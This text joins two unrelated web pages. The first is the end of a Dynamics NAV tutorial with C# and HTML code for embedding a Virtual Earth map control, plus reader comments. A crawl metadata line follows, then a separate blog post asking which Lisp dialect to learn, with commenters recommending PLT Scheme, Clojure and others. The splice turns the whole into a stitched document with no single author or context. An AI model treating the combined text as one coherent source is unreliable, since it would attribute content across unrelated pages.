private string text;
private string html = "<html><body></body></html>";
/// <summary>
/// Constructor for Virtual Earth Integration Control
/// </summary>
/// <param name="template">HTML template for Map content</param>
public VEControl(string template)
{
this.template = template;
this.DocumentCompleted += new WebBrowserDocumentCompletedEventHandler(VEControl_DocumentCompleted);
}
/// <summary>
///
/// </summary>
/// <param name="sender"></param>
/// <param name="e"></param>
void VEControl_DocumentCompleted(object sender, WebBrowserDocumentCompletedEventArgs e)
{
if (this.DocumentText != this.html)
{
this.DocumentText = this.html;
}
}
/// <summary>
/// Property for Data Binding
/// </summary>
public override string Text
{
get
{
return text;
}
set
{
if (text != value)
{
text = value;
if (string.IsNullOrEmpty(value))
{
html = "<html><body></body></html>";
}
else
{
html = this.template;
html = html.Replace("%latitude%", GetParameter("latitude", "0"));
html = html.Replace("%longitude%", GetParameter("longitude", "0"));
html = html.Replace("%zoom%", GetParameter("zoom", "1"));
}
this.DocumentText = html;
}
}
}
/// <summary>
/// Get Parameter from databinding
/// </summary>
/// <param name="parm">Parameter name</param>
/// <param name="defaultvalue">Default Value if the parameter isn’t specified</param>
/// <returns>The value of the parameter (or default)</returns>
private string GetParameter(string parm, string defaultvalue)
{
foreach (string parameter in text.Split('&'))
{
if (parameter.StartsWith(parm + "="))
{
return parameter.Substring(parm.Length + 1);
}
}
return defaultvalue;
}
}
Note, that you will need a using statement to System.Windows.Forms.
This class gets initialized with a html template (our javascript code) and is able to get values like “latitude=50&longitude=2&zoom=15” set as the Text property and based on this render the right map through the template.
The reason for the DocumentCompleted event handler is, that if we try to set the DocumentText property in the browser before it is done rendering the prior DocumentText, it will just ignore the new value. We handle this by hooking up to the event and if the DocumentText is different from the value we have – then this must have happened and we just set it again. We are actually pretty happy that the control works this way, because the javascript is run in a different thread than our main thread and fetching the map control from Virtual Earth etc. will not cause any delays for us.
Now this is just a standard WinForms Control – how do we tell the Client that this is a control, that it can use inside the NAV Client?
The way we chose to implement this is by creating a wrapper, which is the one we register with the NAV Client and this wrapper is responsible for creating the “real” control. This allows us to use 3rd party controls even if they are sealed and/or we don’t have the source for them.
7. Add a html page called SmallVEMap.htm and add the following content
<html>
<head>
<title></title>
<meta http-
<script type="text/javascript" src=""></script>
<script type="text/javascript">
var map = null;
var shape = null;
function GetMap() {
map = new VEMap('myMap');
var latitude = parseFloat("%latitude%");
var longitude = parseFloat("%longitude%");
var zoom = parseInt("%zoom%");
map.SetDashboardSize(VEDashboardSize.Tiny);
var position = new VELatLong(latitude, longitude);
map.LoadMap(position, zoom, 'r', false);
shape = new VEShape(VEShapeType.Pushpin, position);
map.AddShape(shape);
}
</script>
</head>
<body onload="GetMap();" style="margin:0; position:absolute; width:100%; height:100%; overflow: hidden">
<div id='myMap' style="position: absolute; width:100%; height:100%"></div>
</body>
</html>
8. Add a Resource file to the project called Resources.resx, open it and drag the SmallVEMap.htm into the resources file.
9. Add a class called SmallVEControl.cs and add the following classes
[ControlAddInExport("SmallVEControl")]
public class SmallVEControl : StringControlAddInBase, IStringControlAddInDefinition
{
protected override Control CreateControl()
{
var control = new VEControl(Resources.SmallVEMap);
control.MinimumSize = new Size(200, 200);
control.MaximumSize = new Size(500, 500);
control.ScrollBarsEnabled = false;
control.ScriptErrorsSuppressed = true;
control.WebBrowserShortcutsEnabled = false;
return control;
}
public override bool AllowCaptionControl
{
get
{
return false;
}
}
}
You need to add using statements to System.Drawing, Microsoft.Dynamics.Framework.UI.Extensibility, Microsoft.Dynamics.Framework.UI.Extensibility.WinForms and System.Windows.Forms.
The CreateControl is the method called by the NAV Client when it needs to create the actual winforms control. We override this method and create the VEControl and give it the html template.
The reason for overriding the AllowCaptionControl is to specify that our control will not need a caption (else the NAV Client will add a caption control in front of our control).
There are various other methods that can be overridden, but we will touch upon these when needed.
Build your solution and you should now have a VEControl.DLL in the Add-Ins directory under the RoleTailored Client.
And how do I put this control into use in the NAV Client?
First of all we need to tell the Client that the control is there!
We do that by adding an entry to the Client Add-In table (2000000069). You need to specify Control Add-In Name (which would be the name specified in the ControlAddInExport attribute above = SmallVEControl) and the public key token.
But what is the public key token?
Its is the public part of the key-file used to sign the assembly and as you remember, we just asked Visual Studio to create a new key-file so we need to query the key file for it’s public key and we do that by running
sn –T VEControl.snk
in a Visual Studio command prompt.
Note that this public key is NOT the one you need to use, unless you download my solution below.
Having the Control Registered for usage we need to create a new page and call it Customer Map Factbox. This page has SourceTable set to the Customer table and is contains one control, bound to a variable called CustomerLocation, which gets set in the OnAfterGetRecord.
The code in OnAfterGetRecord is
CustomerLocation := 'latitude='+FORMAT(Latitude,0,9)+'&longitude='+FORMAT(Longitude,0,9)+'&zoom=15';
The Customer Map Factbox is added as a part to the Customer Card and the Customer List and the SubFormLink is set to No.=FIELD(No.)
That’s it guys – I realize this is a little rough start on extensibility – I promise that there will be other and more entry level starter examples on extensibility – I just decided to create an end-to-end sample to show how to leverage the Virtual Earth functionality in a Factbox.
As usual you can download the visual studio project here.
Enjoy
Freddy Kristiansen
PM Architect
Microsoft Dynamics NAV
thank you SO much!
Since yesterday I am working on how the Microsoft.Dynamics.Framework.UI.Extensibility is working in CTP2 🙁
it seems like that you use CTP2 because
I see you do not call ControlAddinDefinition wich was needed in CTP1? I am right?
Do you have some tipps for me what is the fastest way to get your solution working?
I will also use it on Thursday where I have a presentation for MS AT at a launch event.
Thanks,
Rene Gayer
(MVP)
Correct this is a CTP2 solution, which has the extensibility API which will ship in SP1.
I didn’t want to post anything using the CTP1 API, since this was going to change.
If you download the solution above – you should be able to compile it and make it work pretty easily with CTP2.
If you want to make it work with CTP1 – you would have to change the base classes and the attribute as you are referring to (I think).
hi, yes I am already download it an compiled it with CTP2.Thank you once again!
Rene | https://blogs.msdn.microsoft.com/freddyk/2009/06/07/integration-to-virtual-earth-part-4-out-of-4/ | CC-MAIN-2018-34 | refinedweb | 1,853 | 54.52 |
UpFront
UpFront
- LJ Index, September 2009
- Why Buy a $350 Thin Client?
- diff -u: What's New in Kernel Development
- Hardware Requirements: None
- Mac OS X, It's Not Linux, but It's Close
- WebcamStudio—Create Your Own On-line Video Show
- They Said It
- LinuxJournal.com
- Non-Linux FOSS
LJ Index, September 2009
1. Percent of all waste that is e-waste: 2
2. Percent of the heavy metals in landfills that come from e-waste: 70
3. Number of separate elements found in e-waste: 38
4. Percent of e-waste bound for recycling that actually gets recycled: 20
5. Average number of electronic items purchased per American household per year: 24
6. Average number of books read per year by adults in the US: 4
7. Percent of adults in the US that read zero books per year: 25
8. Number of hours the average American spends watching TV per day: 4
9. Number of years spent watching TV during a 65-year life: 9
10. Average time someone in the US spends Web surfing each month: 27:38:58
11. Average time someone in France spends Web surfing each month: 19:16:28
12. Average time someone in Spain spends Web surfing each month: 17:52:43
13. Average time someone in the UK spends Web surfing each month: 17:36:55
14. Average time someone in Germany spends Web surfing each month: 17:00:35
15. Average time someone in Italy spends Web surfing each month: 15:02:36
16. Average time someone in Australia spends Web surfing each month: 14:30:16
17. Percent of local advertisers on search engines that choose not to renew: 50
18. Percent of local advertisers on advertising sites that choose not to renew: 60
19. US National Debt as of 06/08/09, 10:51:06am MST: $11,403,815,042,547.90
20. Change in the debt since last month's column: $152,944,501,331.18
1–3: EPA
4: Basel Convention
5: Consumer Electronics Association
6, 7: Washington Post
8: A.C. Nielsen Co.
9, 20: Math
10–16: Telegraph.co.uk
17, 18: The Business Insider
19:
Why Buy a $350 Thin Client?
On August 10, 2009, I'll be at a conference in Troy, Michigan, put on by the LTSP (Linux Terminal Server Project,) crew and their commercial company (). The mini-conference is geared toward people considering thin-client computing for their network. My talk will be targeting education, as that's where I have the most experience.
One of the issues network administrators need to sort out is whether a decent thin client, which costs around $350, is worth the money when full-blown desktops can be purchased for a similar investment. As with most good questions, there's really not only one answer. Thankfully, LTSP is very flexible with the clients it supports, so whatever avenue is chosen, it usually works well. Some of the advantages of actual thin-client devices are:
Setup time is almost zero. The thin clients are designed to be unboxed and turned on.
Because modern thin clients have no moving parts, they very seldom break down and tend to use much less electricity compared to desktop machines.
Top-of-the-line thin clients have sufficient specs to support locally running applications, which takes load off the server without sacrificing ease of installation.
They look great.
There are some advantages to using full desktop machines as thin clients too, and it's possible they will be the better solution for a given install:
Older desktops often can be revitalized as thin clients. Although a 500MHz computer is too slow to be a decent workstation, it can make a very viable thin client.
Netbooks like the Eee PC can be used as thin clients and then used as notebook computers on the go. It makes for a slightly inconvenient desktop setup, but if mobility is important, it might be ideal for some situations.
It's easy to get older computers for free. Even with the disadvantages that come with using old hardware, it's hard to beat free.
Thankfully, with the flexibility of LTSP, any combination of thin clients can coexist in the same network. If you're looking for a great way to manage lots of client computers, the Linux Terminal Server Project might be exactly what you need. I know I couldn't do my job without it.
diff -u: What's New in Kernel Development
Rik van Riel has doubled and doubled again the amount of RAM that can be directly addressed in the x86 64-bit architecture. The previous limit had been 244 bytes, or more than 17 terabytes. The new limit is 246 bytes, or more than 70 terabytes.
The Linux Pulse Per Second (LinuxPPS) Project has had to reset and restart, when Udo van den Heuvel asked why the code hadn't been accepted, and neither Andrew Morton nor Alan Cox could remember any of the objections anyone had against it. They both recommended resubmitting the patches, which at the very least would get the folks who still had problems with the code to speak up again. LinuxPPS is a project to provide a character-device-based API for communication between kernel space and userspace. Rudolfo Giometti took Alan and Andrew's advice a couple weeks later, submitting the core LinuxPPS code for inclusion—the idea being to get everyone signed off on the basic features before introducing any code that might be more controversial. He also pointed out that all previous objections had been fixed, or that the objectors already had agreed the fix could wait. So, it looks like a good thing that Udo asked about this initially, or the perfectly good code might be lingering still.
The XCEP motherboards from IskraTel now are supported in Linux, which is cool, because that motherboard is used in many particle accelerators throughout the world. Michael Abbot recently submitted patches adding this architecture, which runs an ARM XScale PXA255 CPU.
DebugFS soon may be configurable in much more powerful ways. Steven Rostedt has added a feature to enable tracing events defined in a whole directory tree. The previous version required that each event be enabled individually in its own directory. The current version recurses through all child directories, but it also allows users to chop off branches of that directory tree easily if they so desire. What's the cost of all this power? It's no longer easy to identify which tracing events are enabled and which are not, because an event may be controlled by configurations elsewhere in the directory tree. But, as Steven said during the discussion, the information is all there, and a script easily could identify all configured events. As far as the debate went, no one seemed to feel the cons outweighed the pros, so this probably will be accepted into the kernel in the near future.
One thing that doesn't happen often is a hardware vendor asking for advice from the Linux community about how to code its drivers. But, Atul Mukker from LSI Corporation recently did exactly that. He said LSI wanted to take a whole new approach to driver writing, in which it had operating-system-independent code at the core, with a thin layer of support for Linux, Windows and so on. And, he just wanted to know if anyone had any advice. Turns out several folks did—one of the main ones being Jeff Garzik. Jeff recommended Intel's networking drivers as excellent examples of good practice. He suggested modularizing the code so that each piece of hardware would have its own codebase, which also could be kept free of any operating-system-specific code. He also recommended keeping general-purpose code out of the driver entirely, where other drivers could use it more easily. The Application Binary Interface (ABI), Jeff said, also should remain consistent with other drivers already in the kernel. Any feature similar to something found elsewhere should imitate that other interface. Any features that were unique, on the other hand, could create whatever interface seemed best.
Hardware Requirements: None
In two days, I'll be the proud owner of a Kindle DX. That may seem a bit odd, considering how much I despise DRM. The real selling point for me, however, is that it will read PDF files natively, and in full size. As I was looking for the system requirements for the Kindle DX (naively thinking it might sport Linux support), I was amused to see the hardware requirements listed: none.
The Kindle is designed as a self-contained piece of hardware, never needing to connect to a computer. Because it actually mounts as a USB removable device, it will work just fine under Linux. But, more interesting for me is that it never needs to sync at all. And, that got me thinking about my other electronic devices. I have two smartphones that I never connect to a computer. They both have the ability to sync with a computer, but because they're connected to the Internet, I never have had the need to connect them directly to a computer.
Will hardware compatibility fade away into the past? It wouldn't be a bad thing, unless, of course, proprietary hardware drivers are replaced with proprietary network protocols. Luckily, Linux is king on the Internet, so we're much more likely to keep standards in place on-line than in the hands of Windows-savvy developers.
My Kindle DX might have the taint of DRM, but thankfully, it also has support for non-DRM files as well. Although it has support for the non-free Windows operating system, it also supports Linux. And heck, it will run just fine all by itself. I figure that's because it's running Linux as its underlying OS.
Mac OS X, It's Not Linux, but It's Close
In the past, the Mac OS was a fairly unique entity, not having much in common with other OSes, such as Windows or UNIX, which made cross-platform work a bit convoluted. However, the advent of the latest incarnation of the Mac OS, called OS X or Darwin, provides a very comfortable alternative for Linux geeks. Because Darwin is based on BSD UNIX, it is possible to use POSIX-compliant applications on the Mac.
Apple provides a package called Xcode on its developer site. Xcode has the necessary tools for compiling programs on the Mac, and it includes a nice graphical IDE and lots of examples for developing applications for OS X. Xcode is based on the GNU toolset, providing tools like gcc, libtool, make and so on. That means, with Xcode, most command-line applications can be compiled and run on the Mac. So, a simple little hello world program:
#include <stdio.h> #include <stdlib.h> int main (int argc, char **argv) { printf("Hello World\n"); }
compiles fine with gcc, giving you an executable that prints out “Hello World” on the command line. Basically, anything that is POSIX-compliant should compile and run with no issues.
Getting graphical programs to run can be a bit more involved. Mac OS X does provide an X server and all the standard development libraries you would need for a pure X11 application, like Xlib. However, none of the other standard libraries, like GTK or Qt, are available by default. You have to download, compile and install them yourself, which works fairly well, but you have to choose the correct configuration options and collect all the required dependencies. But, you shouldn't need to go through so much pain. Two projects in active development provide some form of package management for GNU software: Fink and MacPorts. Using these, getting and installing GNU software is as easy to do as it is with most Linux distros.
The Fink Project started in 2001 and is based on the Debian package management system, so you can use the Debian package tools like dpkg, dselect and apt-get, making it familiar for Debian-based distro users. Once the base installation is done, you can start to install packages. If you like a text-based manager, use dselect (Figure 1). If you prefer a graphical manager instead, use the following command to get synaptic (Figure 2):
sudo apt-get install synaptic
Using these applications, you can install many of the packages you are familiar with in Linux. The package count, at the time of this writing, is 10,872.
However, not all packages are available as a binary install using these tools. For that class of packages, Fink installs them directly from source, compiling and installing on your Mac. So, for example, if you want to install gramps and do some genealogy work, execute the following:
sudo fink install gramps
Even installing from source, Fink deals well with dependency issues, because it still is based on the Debian package management system.
The MacPorts Project started in 2002 and models itself after the BSD port packaging system. Thus, you use the command to manage the packages on your system. Once you have done the base install, you can install other software packages simply by running the command:
sudo port install stellarium
Several graphical interfaces are available as well, such as Porticus. However, those typically are independent projects, as opposed to the Debian tools available in Fink. As such, their development cycle and behavior tend to be a bit more erratic and unstable than the older and more mature Debian tools. But still, they may be exactly what you're looking for if you prefer a graphical interface. Like the Fink Project, both binary packages and source packages are available. There are 5,829 packages available in the MacPorts Project.
Both projects provide access to the full wealth of open-source applications that has been available to Linux users, and the number of packages provided by both projects continues to grow.
Once you have one, or both, of these projects installed (they will coexist on your system), you will have all the tools necessary to do your own code development. I have used anjuta (Figure 3) on my MacBook to develop some small GNOME applications. These compile and run equally well on my MacBook and my Netbook running Ubuntu. Although there isn't binary compatibility between OS X and Linux, with source compatibility, it is (at least in theory) simply a matter of recompiling for the other system.
Running Mac OS X code on Linux is not as easy as running Linux code on Mac OS X. The real stumbling block is the graphical interface called Quartz on the Mac OS. Although the kernel and most of the command-line tools have been released as open-source software, Quartz still is closed. At the time of this writing, I could not find any references to a reverse-engineered, open-source replacement for Quartz. So the only option available is running OS X inside a virtual machine. Although this is not technically running Mac applications on Linux, it does provide the ability to run OS X on a Linux box.
Apple Developer Connection: developer.apple.com
Open-Source Apple:
Fink Project:
MacPorts Project:
WebcamStudio—Create Your Own On-line Video Show
A few months back, Linux Journal had a live streaming show called, “Linux Journal Live”. It aired once a week and streamed via ustream.tv. One of the frustrating things about running the show was that it was very difficult to get the “studio” feel using Linux. As it happened, we ended up using a Macintosh computer and the freeware CamTwist in order to embed graphics, guest hosts and text.
If we ever resurrect the live show, now we'll be able to stream from our dearly beloved Linux, thanks to the open-source project, WebcamStudio (webcamstudio.sourceforge.net). WebcamStudio allows Linux users to stream Webcams, graphics, text and much more to sites like ustream.tv. If you've ever wanted to try your hand at a live show, be sure to check it out.
They Said It
We're done with the first 80%, and well into the second 80%.
—Larry Wall, referring to Perl 6
Doing linear scans over an associative array is like trying to club someone to death with a loaded Uzi.
—Larry Wall
I don't have to write about the future. For most people, the present is enough like the future to be pretty scary.
—William Gibson
In Cyberspace, the First Amendment is a local ordinance.
—John Perry Barlow
LinuxJournal.com
As we read this month's coverage of cross-platform development, I thought I'd weigh in on the Web development end of things. While I work toward a new-and-improved iteration of LinuxJournal.com, I must constantly consider the needs of users with widely varying operating system and browser configurations. LinuxJournal.com visitors are a technologically diverse bunch. As you might expect, the majority of our Web visitors view LinuxJournal.com with Firefox, but what may surprise you is that a slight majority of those Firefox users are browsing from a Windows machine. Linux and Firefox users are nipping at their heels though. What also may surprise you is the percentage of visitors browsing with some version of Internet Explorer. Granted, that percentage has decreased during the last couple years, but the most recent numbers show about 20% of traffic coming from IE users, down from around 30% a year ago. Other browsers like Chrome, Opera and Safari have a small but important constituent as well, which makes my job just a little more interesting. So, to all of you visiting us from a less-used browser, I am doing my very best to give you the same great experience as the Firefox majority, and to all of those using IE, well, you may drive me to drink. I still welcome you though, and I will do my best to accommodate!
Non-Linux FOSS
Moonlight is an open-source implementation of Microsoft's Silverlight. In case you're not familiar with Silverlight, it's a Web browser plugin that runs rich Internet applications. It provides features such as animation, audio/video playback and vector graphics.
Moonlight programming is done with any of the languages compatible with the Mono runtime environment. Among many others, these languages include C#, VB.NET and Python. Mono, of course, is a multiplatform implementation of ECMA's Common Language Infrastructure (CLI), aka the .NET environment.
A technical collaboration deal between Novell and Microsoft has provided Moonlight with access to Silverlight test suites and gives Moonlight users access to licensed media codecs for video and audio. Moonlight currently supplies stable support for Silverlight 1.0 and Alpha support for Silverlight 2.0.
Silverlight Pad Running on Moonlight | http://www.linuxjournal.com/magazine/upfront-18?quicktabs_1=2 | CC-MAIN-2015-11 | refinedweb | 3,139 | 62.58 |
Shell Drop Handlers are DLLs that are registered in the system to extend the drag and drop functionality in the Shell. You can use these extensions to allow files to become drop targets for other files, or use the standard drag and drop functionality to invoke your own business logic. In this article I will show you how to create a Drag Handler extension using .NET and a library called SharpShell.
The Drag Handler we'll create will allow the user to drag XML files onto an XSD file, and validate the contents of the XML files against the XSD schema. Here's how it'll look.
Above: Here we drag two XML files over an XSD file - the extension kicks in and shows the visual cue 'Link'.
Above: The user releases the mouse and the extension validates the XML files against the XSD, displaying the results in a dialog.
This article is part of the series '.NET Shell Extensions', which includes:
First, create a new C# Class Library project.
Tip: You can use Visual Basic rather than C# - in this article the source code is C# but the method for creating a Visual Basic Shell Extension is just the same.
In this example we'll call the project 'XsdDropHandler'. Rename the 'Class1.cs' file to 'XsdDropHandler.
The now that we've set up the project, we can derive the XsdDropHandler class from SharpDropHandler. SharpDropHandler is the base class for Drop Handler Shell Extensions - and it will provide all of the COM plumbing and interop needed - we'll just implement a couple of abstract members to provide the business logic. So here's how your class should look:
XsdDropHandler
SharpDropHandler
SharpDropHandler
public class XsdDropHandler : SharpDropHandler
{
}
DragEnter
protected abstract void DragEnter(DragEventArgs dragEventArgs);
DragEnter is called when the user has selected some shell items and dragged them over the shell item that you register the extension for (so in our case, this will happen when the user drags anything over an XSD file). You must do the following in the DragEnter function:
Drop
protected abstract void Drop(DragEventArgs dragEventArgs);
Drop is called when the user releases the mouse and the actual functionality needs to be invoked. DragEventArgs are provided in case you need to see things like the keys being pressed or the mouse position.
In our example, we'll open up our validation form in this function.
As described, DragEnter is just going to allow the 'link' effect if EVERY drag file is an XML file. Here's the code:
/// <summary>
/// Checks what operations are available for dragging onto the target with the drag files.
/// </summary>
/// <param name="dragEventArgs">The <see cref="System.Windows.Forms.DragEventArgs"/> instance containing the event data.</param>
protected override void DragEnter(DragEventArgs dragEventArgs)
{
// Check the drag files - if they're all XML, we can validate them against the XSD.
dragEventArgs.Effect =
DragItems.All(di => string.Compare(Path.GetExtension(di), ".xml", StringComparison.InvariantCultureIgnoreCase) == 0)
? DragDropEffects.Link : DragDropEffects.None;
}
This is straightforward enough not to need too much explanation. We use the Linq statement 'All' to verify a condition on every path (that the extension is xml), if this is true we set the drag effect to link.
Drop is even more straightforward - we'll pass the paths to the form.
Tip: Remember that for a SharpDropHandler, the dragged files are stored in the property 'DragFiles' and the object we're dragging over is stored in the property 'SelectedItemPath'.
/// <summary>
/// Performs the drop.
/// </summary>
/// <param name="dragEventArgs">The <see cref="System.Windows.Forms.DragEventArgs"/> instance containing the event data.</param>
protected override void Drop(DragEventArgs dragEventArgs)
{
// Create the validator output form.
var validatorOutputForm = new ValidationOutputForm {XsdFilePath = SelectedItemPath, XmlFilePaths = DragItems};
validatorOutputForm.ShowDialog();
}
In this function, we pass the xsd path (which is the SelectedItemPath property) and the xml paths (the DragItems property) to our ValidationOutputForm, which we'll build next.
Here you can see how straightforward it is to implement the core business logic for the extension.
I'm not going to go into too much detail here - the code is in the XsdDropHandler sample in the source code. This is essentially a very simple WinForms form that shows a list of validation results, the validation results come from using an XmlReader to read the XML files, validating against the provided schema file.
There are just a few things left to do. First, we must add the ComVisible attribute to our class. This because our class is a COM server and must be visible to other code trying to use it.
ComVisible
[ComVisible(true)]
public class XsdDropHandler : SharpDropHandler, ".xsd")]
public class XsdDropHandler : SharpDropHandler
So what have we done here? We've told SharpShell that when registering the server, we want it to be associated with XSD file classes in the system.
You can associate with files, folders, classes, drives and more - full documentation on using the association attribute is available on the CodePlex site at COM Server Associations.
We're done! Building the project creates the XsdDropHandler assembly, which can be registered as a COM server to add the extension to the system, allowing you to drag XML files onto an XSD file to validate them against the schema. XsdDropHandler.dll file. You can also drag the server into the main window. Selecting the server will show you some details on it. Select the server.
Now most SharpShell servers can be tested directly inside this application by selecting them and choosing 'Test Shell' - however, at this stage at least, Shell Drop Handlers cannot be tested in this way. There is another mechanism - press 'Test Shell' to open the test shell, then choose 'Shell Open Dialog'.
Once the shell open dialog has opened, you can drag and drop files over the XSD. If you attach a debugger to the Server Manager, you can debug directly into your extension. Remember that you have to Register the server before you can test it.
You can check the 'Installing and Registering the Shell Extension' section of the .NET Shell Extensions - Shell Context Menus for details on how to install and register these extensions - the process. | http://www.codeproject.com/Articles/529515/NET-Shell-Extensions-Shell-Drop-Handlers?fid=1824881&df=90&mpp=10&sort=Position&spc=Relaxed&select=4480253&tid=4476166 | CC-MAIN-2016-22 | refinedweb | 1,013 | 54.02 |
This is a blog about being a reinvigorated programmer. So it’s ironic that the most successful articles so far (at least in terms of number of hits) have been about The Good Old Days — Whatever happened to programming? and Programming the Commodore 64 being two examples.
One possible response to this would be to change the blog title to The Nostalgic Programmer, but I’m not going to do that — despite what you might think from what I’ve been writing, I am actually looking forwards more than backwards, and there are plenty of things I am excited about right now, including Ruby, refactoring, REST, Rails and even some things that don’t begin with R. Lisp, for example (although I guess I could have squeezed that into the R-list by substituting “recursion-based languages” or somesuch).
I’ve been promising since the second meaningful entry on this blog to learn Lisp, and it’s time to get started seriously. But before I do, I have an important choice to make:
Which Lisp?
Perhaps because of its very long history (it was first specified in 1958), Lisp has become horribly fragmented, and exists in far more mutually incompatible dialects than any other language. Not only that, but most of the dialects have multiple incompatible implementations, too, so you can’t just “learn Lisp” in the sense that you “learn Perl”. You have to pick one.
And that’s where I’m asking your help. I know that some of you out there have a lot of experience with Lisp, or rather, Lisps, and I’d really appreciate your input as I try to make this initial decision.
People generally say that the two principal dialects that you have to choose between are Common Lisp (big, kinda ugly, has comprehensive libraries) and Scheme (small, elegant, deficient in libraries) — and that the former is the best choice if you want to actually get stuff done but the latter is better for educational purposes. On that basis, my bias is towards a Scheme: I don’t particularly expect to use Lisp for any of my actual work (although if it turned out that I did, that would be a bonus), but I want to learn it primarily to become a better programmer.
There’s a third option as well, though: Emacs Lisp. GNU Emacs has been my primary editor since 1987, and I don’t see that changing any time soon. So knowing Emacs Lisp would be of more immediate practical value to me than either Common Lisp or Scheme. Does that seem like a reasonable path to take?
Which Scheme?
Also, supposing I choose Scheme: that still leaves the question of which implementation. Looking at the list of packages provided by the operating system of the computer that I’m writing this on (Ubuntu GNU/Linux 9.10), I see:
That’s a lot of choice. And on my other computer, running MacOS ports, I am offered even more:
Even if I narrow it down to the versions that are easily available on both platforms, that still leaves MIT Scheme, mzscheme, and scheme48. How do I choose between these?
Help me, Internet: you’re my only hope.
P.S. No thanks, I don’t want to learn Haskell instead
Nor Erlang, nor Clojure, nor OCaml, nor any of the other more whizzy and spiffy modern functional languages. I am sure they are all great, and have many important advantages over Boring Old Lisp; but at this stage, I want to start with foundations, and that means the language from 1958, not one of these fashionable arrivistes.
Their time will come.
PLT Scheme is available natively as an app bundle on OSX. Mzscheme is just PLT Scheme without the IDE and the GUI libraries. I wouldn’t recommend using it.
I would definitely choose PLT, there are schemes offering better performance, but no other offers the same library breadth and quality.
PLT Scheme is a great option, it (and the IDE DrScheme) is the variant used in the excellent book How to Design Programs.
This combination of book and scheme dialect is often compared to the even more famous book “Structure and Interpretation of Computer Programs” which uses MIT Scheme.
Depending on how you learn one or the other may better suit you. The differing approaches have been written about in a paper called “The Structure and Interpretation of the Computer Science Curriculum” available at
The language that you’re looking for, Lisp from 1958 is probably more similar to to LISP 1.5 than to more modern languages like Common Lisp or Scheme.
Being Schemer myself, I of course also prefer Scheme to CL. Before beginning to learn Scheme you should be aware that the current Scheme “standard” R6RS is now well adapted in the community and while there are a number of high-quality R6RS implementations, many are going to stay with R5RS and maybe migrate to R7RS.
Whether you choose R5RS or R6RS does not make that much of a difference, though, both have the standard documents and TSPL3 or TSPL4. Though I’d recommend you to choose a Scheme that is in active development like Mz, Larceny, Ikarus, Mosh, Guile, Gambit-C or Bigloo, preferably with an active mailing list where you can (and especially in the beginner-phase should) ask questions.
Personally, I use PLT Scheme (Mz), but keep in mind that PLT, while being a good implementation it has really a lot extensions to Scheme which turn PLT more into a Scheme dialect on its own than a Scheme implementation. Still, it has the most extensive documentation and a friendly mailing list.
I would certainly recommend plt scheme for it’s libraries and ide.
If you want something smaller (extension language) then you might prefer guile.
I’d definitely encourage at least giving Clojure a try — it’s a non-Common Lisp, non-Scheme Lisp-1 (i.e. functions and values share the same namespace, unlike Common Lisp’s weird approach) focused towards concurrent programming. Closest thing to Haskell I’ve seen in a dynamic language — infinite sequences, optional lazy evaluation, etc. And amazingly scalable.
If you really want Lisp as it was in 1958. Then my Lithp project could use some more core implemented. Have fun! ;-)
Clojure; ’nuff said.
On a more serious note, Clojure is _the_ Lisp to learn today.
It’s pragmatic, amazingly well designed, has some great concepts and runs really fast.
Note: Ex-professional Common Lisp programmer and Scheme hobbyist here. Switched to Clojure for real world programming last year and haven’t looked back since.
So, Michel S. and Baishampayan Ghose, you’re telling me that Clojure IS a Lisp? In the same sense that Jython is a version of Python, or are you making a fuzzier statement along the lines that, say, C++ could be argued to be a version of C?
Clojure, definitely. It’s a modern Lisp which actually has a concurrency story. And you’ll enjoy the gazillions of Java libraries that you can immediately use.
“And you’ll enjoy the gazillions of Java libraries” … I’m not sure whether I’d consider that a feature or a bug.
(Don’t worry, I’m only joking. Probably. Mostly. HHOS.)
Common Lisp and Scheme were each standardized (separately) in the 1990s, emerging from a sort of Cambrian explosion of lisp dialects in the decades before. As lisps, they are vastly different from the prototypical and long-obsolete language of 1958, and even each other. Subsequent incarnations of these dialects (in the form of implementations, libraries, and updated standards) serve to distinguish them ever more.
While CL or Scheme are well-defined, the question of what makes a lisp in the general sense (or how any individual dialect measures up) is rather nebulous, and probably of little consequence.
Clojure’s lispy nature is strong, but still different. In some ways it is arguably a logical advancement of the lisp idea, perhaps as Common Lisp or Scheme were (for examples, see Clojure’s generalized sequences, and also its quotation semantics.) Intuitively, Clojure is obviously a lisp.
That said, you would do well to begin learning any of these three dialects. It might not matter which you started with, because I’d wholly recommend exploring all of them; their differences make this approach worthwhile, while their similarities make it easier on the whole. :-)
Emacs Lisp will be immediately more useful, but may prove to be less enlightening in the long-term. (Incidentally, I began this way, and in hindsight I would rather have learned Common Lisp first.)
If it helps, I have written some advice relevant to learning Common Lisp, here: — some of it may apply to other dialects too.
Lisp closest to the spirit of 1958 is just the newcomer: Clojure. Like others revolutions, is based in a back to the essence of roots.
Scheme did it in 70’s, but Clojure is doing now.
To put it nice and short: Take a look at all of them (CL, Scheme, Clojure). They are all worth knowing, and you won’t be able to make a choice until you have at least played a little with all of them.
Because you’re an Emacs user, and probably don’t care much about IDEs like DrScheme, a selling point for CL might be SLIME. Yes, you can also use Cljure and some Scheme dialects from within slime, but so far nothing beats SLIME+CL. Since you will (if you follow my suggestion) learn about all those Lisps anyway, maybe you should go with the one that is best supported in your environment of coice.
As far as Emacs Lisp is concerned: Plowing through (info “(eintr)”) is something that can be done in a weekend. That won’t make you an Emacs guru, but it’ll suffice to get started. Emacs Lisp might not be the greatest language on earth, but as an Emacs user, you’ll really benefit from it.
You shouldn’t view Lisp as a language with various dialects — but as a family of related languages. It’s old enough that “dialects” like Emacs Lisp and Common Lisp are pretty different languages. In particular, Scheme is itself something that should be considered a family of languages in its own right, all related by a very small core specification.
As for the choice of a language to learn, my obvious choice would be PLT Scheme — obvious since I’m one of the PLT hackers… But to get a little more focused on the question of a language to learn, PLT has good documentation (docs.plt-scheme.org), including materials that are intended for learning the language, not just reference manual. For example, the first few entries on the documentation page are guides that are tutorial-like documents that will quickly introduce you to the language, including systems programming and working with the bundled web server (which has enough features that you could certainly use to get some “real work” done with it). These are also included with most PLT Scheme installations (and for that I recommend using our installers over the outdated version that you’d find in Ubuntu…). In addition to these, there is the HtDP textbook (htdp.org) that uses PLT Scheme (but this might be too slow for your taste) and the well known SICP — which can be a lot of fun but is outdated in several places. (If you do choose PLT and read through SICP, then see the support for it at — it would simplify going through the book.)
